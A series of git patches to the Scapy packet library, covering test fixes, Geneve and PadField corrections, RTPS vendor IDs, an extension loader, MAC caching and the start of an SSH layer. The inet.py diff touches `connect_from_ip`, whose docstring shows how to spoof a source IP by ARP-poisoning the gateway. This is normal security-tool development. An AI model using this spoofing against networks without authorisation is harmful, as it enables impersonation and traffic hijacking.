28e95575d16dd69a9f324fe6b9aab590b0bbb60b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 17 Nov 2023 22:16:59 +0100 Subject: [PATCH 1129/1632] Disable enumerator tests --- test/contrib/automotive/scanner/enumerator.uts | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index 6e9eb198eb9..32d9cf1483a 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -1,4 +1,5 @@ % Regression tests for enumerators +~ disabled + Load general modules @@ -1075,4 +1076,4 @@ assert len(args) == 2 assert args["req"] == UDS()/UDS_DSC(b"\x03") assert "diagnosticSessionType" in args["desc"] and "extendedDiagnosticSession" in args["desc"] -assert not tce.enter_state(EcuState(session=1), EcuState(session=3)) \ No newline at end of file +assert not tce.enter_state(EcuState(session=1), EcuState(session=3)) From 6294c6e48c21bcc61a7ce24b27d3ceddd53d356f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 17 Nov 2023 21:55:16 +0100 Subject: [PATCH 1130/1632] Fix geneve tests --- scapy/contrib/geneve.py | 12 ++++++------ test/contrib/geneve.uts | 8 +++++--- 2 files changed, 11 insertions(+), 9 deletions(-) diff --git a/scapy/contrib/geneve.py b/scapy/contrib/geneve.py index 60430fee1f8..b44cb543331 100644 --- a/scapy/contrib/geneve.py +++ b/scapy/contrib/geneve.py @@ -9,7 +9,7 @@ """ Geneve: Generic Network Virtualization Encapsulation -draft-ietf-nvo3-geneve-16 +https://datatracker.ietf.org/doc/html/rfc8926 """ import struct @@ -19,7 +19,6 @@ from scapy.layers.inet import IP, UDP from scapy.layers.inet6 import IPv6 from scapy.layers.l2 import Ether, ETHER_TYPES -from scapy.compat import chb, orb CLASS_IDS = {0x0100: "Linux", 0x0101: "Open vSwitch", @@ -42,12 +41,12 @@ class GeneveOptions(Packet): XByteField("type", 0x00), BitField("reserved", 0, 3), BitField("length", None, 5), - StrLenField('data', '', length_from=lambda x:x.length * 4)] + StrLenField('data', '', length_from=lambda x: x.length * 4)] def post_build(self, p, pay): if self.length is None: tmp_len = len(self.data) // 4 - p = p[:3] + struct.pack("!B", tmp_len) + p[4:] + p = p[:3] + struct.pack("!B", (p[3] & 0x3) | (tmp_len & 0x1f)) + p[4:] return p + pay @@ -61,12 +60,13 @@ class GENEVE(Packet): XShortEnumField("proto", 0x0000, ETHER_TYPES), X3BytesField("vni", 0), XByteField("reserved2", 0x00), - PacketListField("options", [], GeneveOptions, length_from=lambda pkt:pkt.optionlen * 4)] + PacketListField("options", [], GeneveOptions, + length_from=lambda pkt: pkt.optionlen * 4)] def post_build(self, p, pay): if self.optionlen is None: tmp_len = (len(p) - 8) // 4 - p = chb(tmp_len & 0x3f | orb(p[0]) & 0xc0) + p[1:] + p = struct.pack("!B", (p[0] & 0xc0) | (tmp_len & 0x3f)) + p[1:] return p + pay def answers(self, other): diff --git a/test/contrib/geneve.uts b/test/contrib/geneve.uts index e40533b3558..697a359f788 100644 --- a/test/contrib/geneve.uts +++ b/test/contrib/geneve.uts @@ -69,6 +69,8 @@ assert a.mysummary() in ['GENEVE (vni=0x0,optionlen=0,proto=0x800)', 'GENEVE (vn = GENEVE - Optionlen -data = raw(RandString(size=random.randint(0, pow(2, 6)) * 4)) -p = GENEVE(raw(GENEVE(options=GeneveOptions(data=data)))) -assert p[GENEVE].optionlen == (len(data) // 4 + 1) +for size in range(0, 0x1f, 4): + p = GENEVE(bytes(GENEVE(options=GeneveOptions(data=RandString(size))))) + assert p[GENEVE].optionlen == (size // 4 + 1) + assert len(p[GENEVE].options[0].data) == size + From cf8c254af5556caadd3fb82794a7702e6fc8f381 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 10 Oct 2023 09:18:34 +0000 Subject: [PATCH 1131/1632] Fix padwith in PadField --- scapy/fields.py | 7 ++----- test/regression.uts | 5 +++-- 2 files changed, 5 insertions(+), 7 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 9c68ab002e9..f1acd8f616f 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -632,11 +632,8 @@ def addfield(self, ): # type: (...) -> bytes sval = self.fld.addfield(pkt, b"", val) - return s + sval + struct.pack( - "%is" % ( - self.padlen(len(sval), pkt) - ), - self._padwith + return s + sval + ( + self.padlen(len(sval), pkt) * self._padwith ) diff --git a/test/regression.uts b/test/regression.uts index c73e3d27321..2fbb322800a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1470,9 +1470,10 @@ assert p.len == 23 and len(p) == 29 ~ PadField padding class TestPad(Packet): - fields_desc = [ PadField(StrNullField("st", b""),4), StrField("id", b"")] + fields_desc = [ PadField(StrNullField("st", b""), 6, padwith=b"\xff"), StrField("id", b"")] -TestPad() == TestPad(raw(TestPad())) +assert TestPad() == TestPad(raw(TestPad())) +assert raw(TestPad(st=b"st", id=b"id")) == b'st\x00\xff\xff\xffid' = ReversePadField ~ PadField padding From 2150170eedea8a4f36b0b6019c9ee7d54f315768 Mon Sep 17 00:00:00 2001 From: Cooper de Nicola Date: Sat, 18 Nov 2023 16:13:56 -0800 Subject: [PATCH 1132/1632] Updated DDS RTPS Vendor IDs using DDS-Foundation spec (#4159) * Updated DDS RTPS Vendor IDs using DDS-Foundation spec * linter fix --------- Co-authored-by: Cooper de Nicola --- scapy/contrib/rtps/common_types.py | 32 +++++++++++++++++------------- 1 file changed, 18 insertions(+), 14 deletions(-) diff --git a/scapy/contrib/rtps/common_types.py b/scapy/contrib/rtps/common_types.py index adf8cf8b30f..70bc8cc5770 100644 --- a/scapy/contrib/rtps/common_types.py +++ b/scapy/contrib/rtps/common_types.py @@ -279,23 +279,27 @@ def extract_padding(self, p): _rtps_vendor_ids = { 0x0000: "VENDOR_ID_UNKNOWN (0x0000)", - 0x0101: "Real-Time Innovations, Inc. - Connext DDS", - 0x0102: "PrismTech Inc. - OpenSplice DDS", - 0x0103: "Object Computing Incorporated, Inc. (OCI) - OpenDDS", - 0x0104: "MilSoft", - 0x0105: "Gallium Visual Systems Inc. - InterCOM DDS", - 0x0106: "TwinOaks Computing, Inc. - CoreDX DDS", + 0x0101: "Real-Time Innovations, Inc. (RTI) - Connext DDS", + 0x0102: "ADLink Ltd. - OpenSplice DDS", + 0x0103: "Object Computing Inc. (OCI) - OpenDDS", + 0x0104: "MilSoft - Mil-DDS", + 0x0105: "Kongsberg - InterCOM DDS", + 0x0106: "Twin Oaks Computing, Inc. - CoreDX DDS", 0x0107: "Lakota Technical Solutions, Inc.", 0x0108: "ICOUP Consulting", - 0x0109: "ETRI Electronics and Telecommunication Research Institute", + 0x0109: "Electronics and Telecommunication Research Institute (ETRI) - Diamond DDS", 0x010A: "Real-Time Innovations, Inc. (RTI) - Connext DDS Micro", - 0x010B: "PrismTech - OpenSplice Mobile", - 0x010C: "PrismTech - OpenSplice Gateway", - 0x010D: "PrismTech - OpenSplice Lite", - 0x010E: "Technicolor Inc. - Qeo", - 0x010F: "eProsima - Fast-RTPS", - 0x0110: "ADLINK - Cyclone DDS", - 0x0111: "GurumNetworks - GurumDDS", + 0x010B: "ADLink Ltd. - VortexCafe", + 0x010C: "PrismTech Ltd", + 0x010D: "ADLink Ltd. - Vortex Lite", + 0x010E: "Technicolor - Qeo", + 0x010F: "eProsima - FastRTPS, FastDDS", + 0x0110: "Eclipse Foundation - Cyclone DDS", + 0x0111: "Gurum Networks, Inc. - GurumDDS", + 0x0112: "Atostek - RustDDS", + 0x0113: "Nanjing Zhenrong Software Technology Co. \ + - Zhenrong Data Distribution Service (ZRDDS)", + 0x0114: "S2E Software Systems B.V. - Dust DDS", } From 2a841f8945e8921f1f09ecdfe244164db00a9181 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 18 Nov 2023 22:21:38 +0000 Subject: [PATCH 1133/1632] Improve main.interact() banner + support exts --- scapy/config.py | 141 +++++++++++++++++++++++++++++++++++++- scapy/contrib/__init__.py | 3 + scapy/layers/__init__.py | 3 + scapy/main.py | 51 ++++++++++---- scapy/modules/__init__.py | 3 + 5 files changed, 188 insertions(+), 13 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index bc01f1019d6..1f2ff4b9eea 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -18,11 +18,19 @@ import time import warnings +from dataclasses import dataclass +from enum import Enum + import scapy from scapy import VERSION from scapy.base_classes import BasePacket from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS -from scapy.error import log_scapy, warning, ScapyInvalidPlatformException +from scapy.error import ( + log_loading, + log_scapy, + ScapyInvalidPlatformException, + warning, +) from scapy.themes import ColorTheme, NoTheme, apply_ipython_style # Typing imports @@ -513,6 +521,132 @@ def __repr__(self): return "\n".join(c.summary() for c in self._caches_list) +class ScapyExt: + __slots__ = ["modules", "name", "version"] + + class MODE(Enum): + LAYERS = "layers" + CONTRIB = "contrib" + MODULES = "modules" + + @dataclass + class ScapyExtModule: + name: str + mode: 'ScapyExt.MODE' + module: Optional[ModuleType] + + def __init__(self): + self.modules: Dict[str, 'ScapyExt.ScapyExtModule'] = {} + + def config(self, name, version): + self.name = name + self.version = version + + def register(self, name, mode, module=None): + assert mode in self.MODE, "mode must be one of ScapyExt.MODE !" + self.modules[name] = self.ScapyExtModule(name, mode, module) + + def __repr__(self): + return "" % ( + self.name, + self.version, + len(self.modules), + ) + + +class ExtsManager: + __slots__ = ["exts", "_loaded"] + + SCAPY_PLUGIN_CLASSIFIER = 'Framework :: Scapy' + GPLV2_CLASSIFIERS = [ + 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', + 'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)', + ] + + def __init__(self): + self.exts: List[ScapyExt] = [] + self._loaded = [] + + def _register_module(self, name, mode, module): + sys.modules[f"scapy.{mode.value}.{name}"] = module + + def load(self): + """ + Find and loads Extensions. This is executed when Scapy loads. + An ext must include the Scapy Framework classifier, a scapy_ext func and be + under GPLv2. + """ + import importlib + import importlib.metadata + for distr in importlib.metadata.distributions(): + if any( + v == self.SCAPY_PLUGIN_CLASSIFIER + for k, v in distr.metadata.items() if k == 'Classifier' + ): + try: + pkg = next( + k + for k, v in importlib.metadata.packages_distributions().items() + if distr.name in v + ) + except KeyError: + pkg = distr.name + if pkg in self._loaded: + continue + if not any( + v in self.GPLV2_CLASSIFIERS + for k, v in distr.metadata.items() if k == 'Classifier' + ): + log_loading.warning( + "'%s' has no GPLv2 classifier therefore cannot be loaded." % pkg # noqa: E501 + ) + continue + self._loaded.append(pkg) + ext = ScapyExt() + try: + scapy_ext = importlib.import_module(pkg) + except Exception as ex: + log_loading.warning( + "'%s' failed during import with %s" % ( + pkg, + ex + ) + ) + continue + try: + scapy_ext_func = scapy_ext.scapy_ext + except AttributeError: + log_loading.info( + "Module '%s' included the Scapy Framework specifier " + "but did not include a scapy_ext" % pkg + ) + continue + try: + scapy_ext_func(ext) + except Exception as ex: + log_loading.warning( + "'%s' failed during initialization with %s" % ( + pkg, + ex + ) + ) + continue + for mod in ext.modules.values(): + self._register_module(mod.name, mod.mode, mod.module) + self.exts.append(ext) + + def __repr__(self): + from scapy.utils import pretty_list + return pretty_list( + [ + (x.name, x.version, [y.name for y in x.modules.values()]) + for x in self.exts + ], + [("Name", "Version", "Modules")], + sortBy=0, + ) + + def _version_checker(module, minver): # type: (ModuleType, Tuple[int, ...]) -> bool """Checks that module has a higher version that minver. @@ -893,6 +1027,7 @@ class Conf(ConfClass): #: a dict which can be used by contrib layers to store local #: configuration contribs = dict() # type: Dict[str, Any] + exts: ExtsManager = ExtsManager() crypto_valid = isCryptographyValid() crypto_valid_advanced = isCryptographyAdvanced() #: controls whether or not to display the fancy banner @@ -961,6 +1096,10 @@ def __getattribute__(self, attr): conf = Conf() # type: Conf +# Python 3.8 Only +if sys.version_info >= (3, 8): + conf.exts.load() + def crypto_validator(func): # type: (DecoratorCallable) -> DecoratorCallable diff --git a/scapy/contrib/__init__.py b/scapy/contrib/__init__.py index 82f83176f1d..8c54a8489ae 100644 --- a/scapy/contrib/__init__.py +++ b/scapy/contrib/__init__.py @@ -6,3 +6,6 @@ """ Package of contrib modules that have to be loaded explicitly. """ + +# Make sure config is loaded +import scapy.config # noqa: F401 diff --git a/scapy/layers/__init__.py b/scapy/layers/__init__.py index 79156832c8e..74f9906a2f4 100644 --- a/scapy/layers/__init__.py +++ b/scapy/layers/__init__.py @@ -6,3 +6,6 @@ """ Layer package. """ + +# Make sure config is loaded +import scapy.config # noqa: F401 diff --git a/scapy/main.py b/scapy/main.py index 254da828918..b7be643520a 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -352,6 +352,21 @@ def _scapy_builtins(): } +def _scapy_exts(): + # type: () -> Dict[str, Any] + """Load Scapy exts and return their builtins""" + from scapy.config import conf + res = {} + for ext in conf.exts.exts: + for mod in ext.modules.values(): + res.update({ + k: v + for k, v in mod.module.__dict__.copy().items() + if _validate_local(k) + }) + return res + + def save_session(fname="", session=None, pickleProto=-1): # type: (str, Optional[Dict[str, Any]], int) -> None """Save current Scapy session to the file specified in the fname arg. @@ -518,6 +533,9 @@ def init_session(session_name, # type: Optional[Union[str, None]] # Load Scapy scapy_builtins = _scapy_builtins() + # Load exts + scapy_builtins.update(_scapy_exts()) + SESSION.update(scapy_builtins) SESSION["_scpybuiltins"] = scapy_builtins.keys() builtins.__dict__["scapy_session"] = SESSION @@ -799,20 +817,36 @@ def ptpython_configure(repl): # Style.from_dict(_custom_ui_colorscheme)) # repl.use_ui_colorscheme("scapy") - # Start IPython or ptipython + # Extend banner text if conf.interactive_shell in ["ipython", "ptipython"]: import IPython if conf.interactive_shell == "ptipython": - from ptpython.ipython import embed banner = banner_text + " using IPython %s" % IPython.__version__ try: from importlib.metadata import version ptpython_version = " " + version('ptpython') except ImportError: ptpython_version = "" - banner += " and ptpython%s\n" % ptpython_version + banner += " and ptpython%s" % ptpython_version + else: + banner = banner_text + " using IPython %s" % IPython.__version__ + elif conf.interactive_shell == "ptpython": + try: + from importlib.metadata import version + ptpython_version = " " + version('ptpython') + except ImportError: + ptpython_version = "" + banner = banner_text + " using ptpython%s" % ptpython_version + elif conf.interactive_shell == "bpython": + import bpython + banner = banner_text + " using bpython %s" % bpython.__version__ + + # Start IPython or ptipython + if conf.interactive_shell in ["ipython", "ptipython"]: + if conf.interactive_shell == "ptipython": + from ptpython.ipython import embed + banner += "\n" else: - banner = banner_text + " using IPython %s\n" % IPython.__version__ from IPython import start_ipython as embed try: from traitlets.config.loader import Config @@ -867,14 +901,9 @@ def ptpython_configure(repl): # ptpython has special, non-default handling of __repr__ which breaks Scapy. # For instance: >>> IP() log_loading.warning("ptpython support is currently partially broken") - try: - from importlib.metadata import version - ptpython_version = " " + version('ptpython') - except ImportError: - ptpython_version = "" - banner = banner_text + " using ptpython%s" % ptpython_version from ptpython.repl import embed # ptpython has no banner option + banner += "\n" print(banner) embed( locals=SESSION, @@ -884,9 +913,7 @@ def ptpython_configure(repl): ) # Start bpython elif conf.interactive_shell == "bpython": - import bpython from bpython.curtsies import main as embed - banner = banner_text + " using bpython %s" % bpython.__version__ embed( args=["-q", "-i"], locals_=SESSION, diff --git a/scapy/modules/__init__.py b/scapy/modules/__init__.py index 0c399dc5ef3..1bf976f08af 100644 --- a/scapy/modules/__init__.py +++ b/scapy/modules/__init__.py @@ -6,3 +6,6 @@ """ Package of extension modules that have to be loaded explicitly. """ + +# Make sure config is loaded +import scapy.config # noqa: F401 From a1f0287f1460925a580876d2151e0216a1c0669b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 19 Nov 2023 16:23:42 +0100 Subject: [PATCH 1134/1632] Cache `get_if_hwaddr` for SourceMACField (#4187) * Cache get_if_hwaddr for SourceMACField * Cache gateway before poisoning in connect_from_ip * Apply suggestion by guedou Co-authored-by: Guillaume Valadon * Fix PEP8 --------- Co-authored-by: Guillaume Valadon --- scapy/arch/libpcap.py | 10 ++++++++-- scapy/fields.py | 2 +- scapy/interfaces.py | 6 +++--- scapy/layers/inet.py | 12 ++++++++---- scapy/layers/l2.py | 7 ++----- test/linux.uts | 21 ++++++++++----------- 6 files changed, 32 insertions(+), 26 deletions(-) diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index fc4b210f4fa..ee25b16334c 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -432,15 +432,21 @@ def load(self): from scapy.arch import get_if_hwaddr try: mac = get_if_hwaddr(ifname) - except Exception: + except Exception as ex: # There are at least 3 different possible exceptions + log_loading.warning( + "Could not get MAC address of interface '%s': %s." % ( + ifname, + ex, + ) + ) continue if_data = { 'name': ifname, 'description': description or ifname, 'network_name': ifname, 'index': i, - 'mac': mac or '00:00:00:00:00:00', + 'mac': mac, 'ips': ips, 'flags': flags } diff --git a/scapy/fields.py b/scapy/fields.py index f1acd8f616f..d2813190097 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -781,7 +781,7 @@ def __init__(self, name, default): def i2m(self, pkt, x): # type: (Optional[Packet], Optional[str]) -> bytes - if x is None: + if not x: return b"\0\0\0\0\0\0" try: y = mac2str(x) diff --git a/scapy/interfaces.py b/scapy/interfaces.py index 6a4b51822d2..f40f529ea8b 100644 --- a/scapy/interfaces.py +++ b/scapy/interfaces.py @@ -291,8 +291,8 @@ def dev_from_index(self, if_index): return self.dev_from_networkname(conf.loopback_name) raise ValueError("Unknown network interface index %r" % if_index) - def _add_fake_iface(self, ifname): - # type: (str) -> None + def _add_fake_iface(self, ifname, mac="00:00:00:00:00:00"): + # type: (str, str) -> None """Internal function used for a testing purpose""" data = { 'name': ifname, @@ -300,7 +300,7 @@ def _add_fake_iface(self, ifname): 'network_name': ifname, 'index': -1000, 'dummy': True, - 'mac': '00:00:00:00:00:00', + 'mac': mac, 'flags': 0, 'ips': ["127.0.0.1", "::"], # Windows only diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 247a2905f48..f46ed7f5e4e 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1999,7 +1999,9 @@ def receive_data(self, pkt): # Answer with an Ack self.send(self.l4) # Process data - will be sent to the SuperSocket through this - self._transmit_packet(self.rcvbuf.process(pkt)) + pkt = self.rcvbuf.process(pkt) + if pkt: + self._transmit_packet(pkt) @ATMT.ioevent(ESTABLISHED, name="tcp", as_supersocket="tcplink") def outgoing_data_received(self, fd): @@ -2184,7 +2186,7 @@ class connect_from_ip: :param srcip: the IP to spoof. the cache of the gateway will be poisonned with this IP. :param poison: (optional, default True) ARP poison the gateway (or next hop), - so that it answers us. + so that it answers us (only one packet). :param timeout: (optional) the socket timeout. Example - Connect to 192.168.0.1:80 spoofing 192.168.0.2:: @@ -2207,14 +2209,15 @@ class connect_from_ip: resp = sock.sr1(HTTP() / HTTPRequest(Path="/")) """ - def __init__(self, host, port, srcip, poison=True, timeout=1): + def __init__(self, host, port, srcip, poison=True, timeout=1, debug=0): host = str(Net(host)) - # poison the next hop if poison: + # poison the next hop gateway = conf.route.route(host)[2] if gateway == "0.0.0.0": # on lan gateway = host + getmacbyip(gateway) # cache real gateway before poisoning arpcachepoison(gateway, srcip, count=1, interval=0, verbose=0) # create a socket pair self._sock, self.sock = socket.socketpair() @@ -2223,6 +2226,7 @@ def __init__(self, host, port, srcip, poison=True, timeout=1): host, port, srcip=srcip, external_fd={"tcp": self._sock}, + debug=debug, ) # start the TCP_client self.client.runbg() diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 06ceccebb14..07c8c0c652a 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -51,7 +51,7 @@ XShortEnumField, XShortField, ) -from scapy.interfaces import _GlobInterfaceType +from scapy.interfaces import _GlobInterfaceType, resolve_iface from scapy.packet import bind_layers, Packet from scapy.plist import ( PacketList, @@ -203,10 +203,7 @@ def i2h(self, pkt, x): if iff is None: iff = conf.iface if iff: - try: - x = get_if_hwaddr(iff) - except Exception as e: - warning("Could not get the source MAC: %s" % e) + x = resolve_iface(iff).mac if x is None: x = "00:00:00:00:00:00" return super(SourceMACField, self).i2h(pkt, x) diff --git a/test/linux.uts b/test/linux.uts index 48e27921cbd..33728a4c059 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -110,23 +110,22 @@ assert exit_status == 0 = IPv6 link-local address selection -conf.ifaces._add_fake_iface("scapy0") +conf.ifaces._add_fake_iface("scapy0", 'e2:39:91:79:19:10') from mock import patch conf.route6.routes = [('fe80::', 64, '::', 'scapy0', ['fe80::e039:91ff:fe79:1910'], 256)] conf.route6.ipv6_ifaces = set(['scapy0']) bck_conf_iface = conf.iface conf.iface = "scapy0" -with patch("scapy.layers.l2.get_if_hwaddr") as mgih: - mgih.return_value = 'e2:39:91:79:19:10' - p = Ether()/IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1") - print(p.sprintf("%Ether.src% > %Ether.dst%\n%IPv6.src% > %IPv6.dst%")) - ip6_ll_address = 'fe80::e039:91ff:fe79:1910' - print(p[IPv6].src, ip6_ll_address) - assert p[IPv6].src == ip6_ll_address - mac_address = 'e2:39:91:79:19:10' - print(p[Ether].src, mac_address) - assert p[Ether].src == mac_address + +p = Ether()/IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1") +print(p.sprintf("%Ether.src% > %Ether.dst%\n%IPv6.src% > %IPv6.dst%")) +ip6_ll_address = 'fe80::e039:91ff:fe79:1910' +print(p[IPv6].src, ip6_ll_address) +assert p[IPv6].src == ip6_ll_address +mac_address = 'e2:39:91:79:19:10' +print(p[Ether].src, mac_address) +assert p[Ether].src == mac_address conf.iface = bck_conf_iface conf.route6.resync() From 5160430bd16c6084d5aef2a10e47dc0455aace40 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 12 Nov 2023 15:14:11 +0100 Subject: [PATCH 1135/1632] Add SSHv2 (RFC 4250, 4251, 4252, 4253 and 4254) --- scapy/layers/ssh.py | 496 ++++++++++++++++++++++++++++++++++++ test/pcaps/ssh_ed25519.pcap | Bin 0 -> 8188 bytes test/scapy/layers/ssh.uts | 37 +++ 3 files changed, 533 insertions(+) create mode 100644 scapy/layers/ssh.py create mode 100644 test/pcaps/ssh_ed25519.pcap create mode 100644 test/scapy/layers/ssh.uts diff --git a/scapy/layers/ssh.py b/scapy/layers/ssh.py new file mode 100644 index 00000000000..a7fbbd52714 --- /dev/null +++ b/scapy/layers/ssh.py @@ -0,0 +1,496 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +Secure Shell (SSH) Transport Layer Protocol + +RFC 4250, 4251, 4252, 4253 and 4254 +""" + +from scapy.config import conf +from scapy.compat import plain_str +from scapy.fields import ( + BitLenField, + ByteField, + ByteEnumField, + IntEnumField, + IntField, + PacketField, + PacketListField, + PacketLenField, + FieldLenField, + FieldListField, + StrLenField, + StrFixedLenField, + StrNullField, + YesNoByteField, +) +from scapy.packet import Packet, bind_bottom_up, bind_layers + +from scapy.layers.inet import TCP + + +class StrCRLFField(StrNullField): + DELIMITER = b"\r\n" + + +class _SSHHeaderField(FieldListField): + def getfield(self, pkt, s): + val = [] + while s: + s, v = self.field.getfield(pkt, s) + val.append(v) + if v[:4] == b"SSH-": + return s, val + return s, val + + +# RFC 4251 - SSH Architecture +# This RFC defines some types + +# RFC 4251 - sect 5 + + +class _ComaStrField(StrLenField): + islist = 1 + + def m2i(self, pkt, x): + return super(_ComaStrField, self).m2i(pkt, x).split(b",") + + def i2m(self, pkt, x): + return super(_ComaStrField, self).i2m(pkt, b",".join(x)) + + +class SSHString(Packet): + fields_desc = [ + FieldLenField("length", None, length_of="value", fmt="!I"), + StrLenField("value", 0, length_from=lambda pkt: pkt.length), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class SSHPacketStringField(PacketField): + __slots__ = ["sub_cls"] + + def __init__(self, name, sub_cls): + self.sub_cls = sub_cls + super(SSHPacketStringField, self).__init__(name, SSHString(), SSHString) + + def m2i(self, pkt, x): + x = super(SSHPacketStringField, self).m2i(pkt, x) + x.value = self.sub_cls(x.value) + return x + + +class NameList(Packet): + fields_desc = [ + FieldLenField("length", None, length_of="names", fmt="!I"), + _ComaStrField("names", [], length_from=lambda pkt: pkt.length), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class Mpint(Packet): + fields_desc = [ + FieldLenField("length", None, length_of="value", fmt="!I"), + BitLenField("value", 0, length_from=lambda pkt: pkt.length * 8), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# RFC4250 - sect 4.1.2 + +_SSH_message_numbers = { + # RFC4253 - SSH-TRANS + 1: "SSH_MSG_DISCONNECT", + 2: "SSH_MSG_IGNORE", + 3: "SSH_MSG_UNIMPLEMENTED", + 4: "SSH_MSG_DEBUG", + 5: "SSH_MSG_SERVICE_REQUEST", + 6: "SSH_MSG_SERVICE_ACCEPT", + 7: "SSH_MSG_EXT_INFO", # RFC 8308 + 8: "SSH_MSG_NEWCOMPRESS", + 20: "SSH_MSG_KEXINIT", + 21: "SSH_MSG_NEWKEYS", + # Errata 152 of RFC4253 + 30: "SSH_MSG_KEXDH_INIT", + 31: "SSH_MSG_KEXDH_REPLY", + # RFC4252 - SSH-USERAUTH + 50: "SSH_MSG_USERAUTH_REQUEST", + 51: "SSH_MSG_USERAUTH_FAILURE", + 52: "SSH_MSG_USERAUTH_SUCCESS", + 53: "SSH_MSG_USERAUTH_BANNER", + # RFC4254 - SSH-CONNECT + 80: "SSH_MSG_GLOBAL_REQUEST", + 81: "SSH_MSG_REQUEST_SUCCESS", + 82: "SSH_MSG_REQUEST_FAILURE", + 90: "SSH_MSG_CHANNEL_OPEN", + 91: "SSH_MSG_CHANNEL_OPEN_CONFIRMATION", + 92: "SSH_MSG_CHANNEL_OPEN_FAILURE", + 93: "SSH_MSG_CHANNEL_WINDOW_ADJUST", + 94: "SSH_MSG_CHANNEL_DATA", + 95: "SSH_MSG_CHANNEL_EXTENDED_DATA", + 96: "SSH_MSG_CHANNEL_EOF", + 97: "SSH_MSG_CHANNEL_CLOSE", + 98: "SSH_MSG_CHANNEL_REQUEST", + 99: "SSH_MSG_CHANNEL_SUCCESS", + 100: "SSH_MSG_CHANNEL_FAILURE", +} + +# RFC4253 - sect 6 + +_SSH_messages = {} + + +def _SSHPayload(x, **kwargs): + return _SSH_messages.get(x and x[0], conf.raw_layer)(x) + + +class SSH(Packet): + name = "SSH - Binary Packet" + fields_desc = [ + IntField("packet_length", None), + ByteField("padding_length", None), + PacketLenField( + "pay", + None, + _SSHPayload, + length_from=lambda pkt: pkt.packet_length - pkt.padding_length - 1, + ), + StrLenField("random_padding", b"", length_from=lambda pkt: pkt.padding_length), + # StrField("mac", b""), + ] + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 4 and _pkt[:4] == b"SSH-": + return SSHVersionExchange + return cls + + def mysummary(self): + if self.pay: + if isinstance(self.pay, conf.raw_layer): + return "SSH type " + str(self.pay.load[0]), [TCP, SSH] + return "SSH " + self.pay.sprintf("%type%"), [TCP, SSH] + return "SSH", [TCP, SSH] + + +# RFC4253 - sect 4.2 + + +class SSHVersionExchange(Packet): + name = "SSH - Protocol Version Exchange" + fields_desc = [ + _SSHHeaderField( + "lines", + [], + StrCRLFField("", b""), + ) + ] + + def mysummary(self): + return "SSH - Version Exchange %s" % plain_str(self.lines[-1]), [TCP] + + +# RFC4253 - sect 6.6 + +_SSH_certificates = {} +_SSH_publickeys = {} +_SSH_signatures = {} + + +class _SSHCertificate(PacketField): + def m2i(self, pkt, x): + return _SSH_certificates.get(pkt.format_identifier.value, self.cls)(x) + + +class _SSHPublicKey(PacketField): + def m2i(self, pkt, x): + return _SSH_publickeys.get(pkt.format_identifier.value, self.cls)(x) + + +class _SSHSignature(PacketField): + def m2i(self, pkt, x): + return _SSH_signatures.get(pkt.format_identifier.value, self.cls)(x) + + +class SSHCertificate(Packet): + fields_desc = [ + PacketField("format_identifier", SSHString(), SSHString), + _SSHCertificate("data", None, conf.raw_layer), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class SSHPublicKey(Packet): + fields_desc = [ + PacketField("format_identifier", SSHString(), SSHString), + _SSHPublicKey("data", None, conf.raw_layer), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +class SSHSignature(Packet): + fields_desc = [ + PacketField("format_identifier", SSHString(), SSHString), + _SSHSignature("data", None, conf.raw_layer), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# RFC4253 - sect 7.1 + + +class SSHKexInit(Packet): + fields_desc = [ + ByteEnumField("type", 20, _SSH_message_numbers), + StrFixedLenField("cookie", b"", length=16), + PacketField("kex_algorithms", NameList(), NameList), + PacketField("server_host_key_algorithms", NameList(), NameList), + PacketField("encryption_algorithms_client_to_server", NameList(), NameList), + PacketField("encryption_algorithms_server_to_client", NameList(), NameList), + PacketField("mac_algorithms_client_to_server", NameList(), NameList), + PacketField("mac_algorithms_server_to_client", NameList(), NameList), + PacketField("compression_algorithms_client_to_server", NameList(), NameList), + PacketField("compression_algorithms_server_to_client", NameList(), NameList), + PacketField("languages_client_to_server", NameList(), NameList), + PacketField("languages_server_to_client", NameList(), NameList), + 